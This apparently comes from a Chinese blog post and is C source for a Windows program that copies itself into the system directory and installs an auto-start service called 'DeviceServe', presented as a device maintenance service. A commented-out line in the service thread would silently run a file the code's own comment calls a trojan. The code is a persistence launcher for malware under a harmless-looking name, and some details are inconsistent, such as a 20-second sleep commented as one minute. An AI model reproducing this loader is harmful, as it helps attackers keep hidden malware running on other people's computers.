#include <stdio.h>
#include <windows.h>
SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE ServiceStatusHandle;
void WINAPI CmdStart(DWORD, LPTSTR *);
void WINAPI CmdControl(DWORD);
DWORD WINAPI CmdService(LPVOID);
void InstallCmdService(void);
void RemoveCmdService(void);
void Usage(void);
int main(int argc, char *argv[])
{
SERVICE_TABLE_ENTRY DispatchTable[] =
{
{ "DeviceServe", CmdStart },
{ NULL, NULL }
};
if (argc == 2)
{
if (!stricmp(argv[1], "-install"))
{
InstallCmdService();
}
else if (!stricmp(argv[1], "-remove"))
{
RemoveCmdService();
}
else
{
Usage();
}
return 0;
}
StartServiceCtrlDispatcher(DispatchTable);
return 0;
}
//服务主函数
void WINAPI CmdStart(DWORD dwArgc, LPTSTR *lpArgv)
{
HANDLE hThread;
ServiceStatus.dwServiceType = SERVICE_WIN32;
ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP
| SERVICE_ACCEPT_PAUSE_CONTINUE;
ServiceStatus.dwServiceSpecificExitCode = 0;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
ServiceStatusHandle = RegisterServiceCtrlHandler("DeviceServe", CmdControl);
//注册服务请求处理函数 CmdControl
if (ServiceStatusHandle == 0)
{
OutputDebugString("RegisterServiceCtrlHandler Error !\n");
return;
}
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
//更新服务控制管理器状态
if (SetServiceStatus(ServiceStatusHandle, &ServiceStatus) == 0)
{
OutputDebugString("SetServiceStatus in CmdStart Error !\n");
return;
}
hThread = CreateThread(NULL, 0, CmdService, NULL, 0, NULL);
if (hThread == NULL)
{
OutputDebugString("CreateThread in CmdStart Error !\n");
}
return;
}
//服务请求处理函数
void WINAPI CmdControl(DWORD dwCode)
{
switch (dwCode)
{
case SERVICE_CONTROL_PAUSE:
ServiceStatus.dwCurrentState = SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
break;
case SERVICE_CONTROL_STOP:
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
if (SetServiceStatus(ServiceStatusHandle, &ServiceStatus) == 0)
{
OutputDebugString("SetServiceStatus in CmdControl in Switch Error !\n");
}
return;
case SERVICE_CONTROL_INTERROGATE:
break;
default:
break;
}
if (SetServiceStatus(ServiceStatusHandle, &ServiceStatus) == 0)
{
OutputDebugString("SetServiceStatus in CmdControl out Switch Error !\n");
}
return;
}
//服务主线程
DWORD WINAPI CmdService(LPVOID lpParam)
{
Sleep(20000); // 1分钟后
MessageBox(NULL, "", "", 0);
//::WinExec("hinstall.exe", SW_HIDE); // 木马 hinstall.exe
return 0;
}
void InstallCmdService(void)
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
char lpCurrentPath[MAX_PATH];
char lpImagePath[MAX_PATH];
char svExeFile[MAX_PATH];
char cDescription[MAX_PATH] = "设备维护服务。";
char *lpHostName;
WIN32_FIND_DATA FileData;
HANDLE hSearch;
DWORD dwErrorCode;
SERVICE_STATUS InstallServiceStatus;
HKEY key;
GetSystemDirectory(lpImagePath, MAX_PATH);
strcat(lpImagePath, "\\DeviceServe.exe");
lpHostName = NULL;
hSearch = FindFirstFile(lpImagePath, &FileData);
if (hSearch == INVALID_HANDLE_VALUE)
{
GetModuleFileName(NULL, lpCurrentPath, MAX_PATH);
if (CopyFile(lpCurrentPath, lpImagePath, FALSE) == 0)
{
dwErrorCode = GetLastError();
if (dwErrorCode == 5)
{
printf("Failure ... Access is Denied !\n");
}
else
{
printf("Failure !\n");
}
return;
}
else
{
printf("Success !\n");
}
}
else
{
printf("already Exists !\n");
FindClose(hSearch);
}
schSCManager = OpenSCManager(lpHostName, NULL, SC_MANAGER_ALL_ACCESS);
if (schSCManager == NULL)
{
printf("Open Service Control Manager Database Failure !\n");
return;
}
printf("Creating Service .... ");
schService = CreateService(schSCManager, "DeviceServe", "DeviceServe", SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,
"D:\\00-VC\\自己编写实例\\o\\ConsoleApplication2\\ConsoleApplication2\\DeviceServe.exe",//要执行的文件地址;
NULL, NULL, NULL, NULL, NULL);
if (schService == NULL)
{
dwErrorCode = GetLastError();
if (dwErrorCode != ERROR_SERVICE_EXISTS)
{
printf("Failure !\n");
CloseServiceHandle(schSCManager);
return;
}
else
{
printf("already Exists !\n");
schService = OpenService(schSCManager, "DeviceServe", SERVICE_START);
if (schService == NULL)
{
printf("Opening Service .... Failure !\n");
CloseServiceHandle(schSCManager);
return;
}
}
}
else
{
printf("Success !\n");
strcpy(svExeFile, "SYSTEM\\CurrentControlSet\\Services\\");
strcat(svExeFile, "DeviceServe");
if (RegOpenKey(HKEY_LOCAL_MACHINE, svExeFile, &key) == ERROR_SUCCESS)
{
RegSetValueEx(key, "Description", 0, REG_SZ, (BYTE *)cDescription, lstrlen(cDescription));
RegCloseKey(key);
}
}
printf("Starting Service .... ");
if (StartService(schService, 0, NULL) == 0)
{
dwErrorCode = GetLastError();
if (dwErrorCode == ERROR_SERVICE_ALREADY_RUNNING)
{
printf("already Running !\n");
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
return;
}
}
else
{
printf("Pending ... ");
}
while (QueryServiceStatus(schService, &InstallServiceStatus) != 0)
{
if (InstallServiceStatus.dwCurrentState == SERVICE_START_PENDING)
{
Sleep(100);
}
else
{
break;
}
}
if (InstallServiceStatus.dwCurrentState != SERVICE_RUNNING)
{
printf("Failure !\n");
}
else
{
printf("Success !\n");
}
CloseServiceHandle(schService);
CloseServiceHandle(schSCManager);
return;
}
void RemoveCmdService(void)
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
char lpImagePath[MAX_PATH];
char *lpHostName;
WIN32_FIND_DATA FileData;
SERVICE_STATUS RemoveServiceStatus;
HANDLE hSearch;
DWORD dwErrorCode;
GetSystemDirectory(lpImagePath, MAX_PATH);
strcat(lpImagePath, "\\DeviceServe.exe");
lpHostName = NULL;
schSCManager = OpenSCManager(lpHostName, NULL, SC_MANAGER_ALL_ACCESS);
if (schSCManager == NULL)
{
printf("Opening SCM ......... ");
dwErrorCode = GetLastError();
if (dwErrorCode != 5)
{
printf("Failure !\n");
}
else
{
printf("Failuer ... Access is Denied !\n");
}
return;
}
schService = OpenService(schSCManager, "DeviceServe", SERVICE_ALL_ACCESS);
if (schService == NULL)
{
printf("Opening Service ..... ");
dwErrorCode = GetLastError();
if (dwErrorCode == 1060)
{
printf("no Exists !\n");
}
else
{
printf("Failure !\n");
}
CloseServiceHandle(schSCManager);
}
else
{
printf("Stopping Service .... ");
if (QueryServiceStatus(schService, &RemoveServiceStatus) != 0)
{
if (RemoveServiceStatus.dwCurrentState == SERVICE_STOPPED)
{
printf("already Stopped !\n");
}
else
{
printf("Pending ... ");
if (ControlService(schService, SERVICE_CONTROL_STOP, &RemoveServiceStatus) != 0)
{
while (RemoveServiceStatus.dwCurrentState == SERVICE_STOP_PENDING)
{
Sleep(10);
QueryServiceStatus(schService, &RemoveServiceStatus);
}
if (RemoveServiceStatus.dwCurrentState == SERVICE_STOPPED)
{
printf("Success !\n");
}
else
{
printf("Failure !\n");
}
}
else
{
printf("Failure !\n");
}
}
}
else
{
printf("Query Failure !\n");
}
printf("Removing Service .... ");
if (DeleteService(schService) == 0)
{
printf("Failure !\n");
}
else
{
printf("Success !\n");
}
}
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
printf("Removing File ....... ");
Sleep(1500);
hSearch = FindFirstFile(lpImagePath, &FileData);
if (hSearch == INVALID_HANDLE_VALUE)
{
printf("no Exists !\n");
}
else
{
if (DeleteFile(lpImagePath) == 0)
{
printf("Failure !\n");
}
else
{
printf("Success !\n");
}
FindClose(hSearch);
}
return;
}
void Usage()
{
printf(" AddServe -Install (Install in the localhost)\n");
printf(" AddServe -Remove (Remove in the localhost)\n");
return;
}
注册服务程序
最新推荐文章于 2023-03-07 17:56:25 发布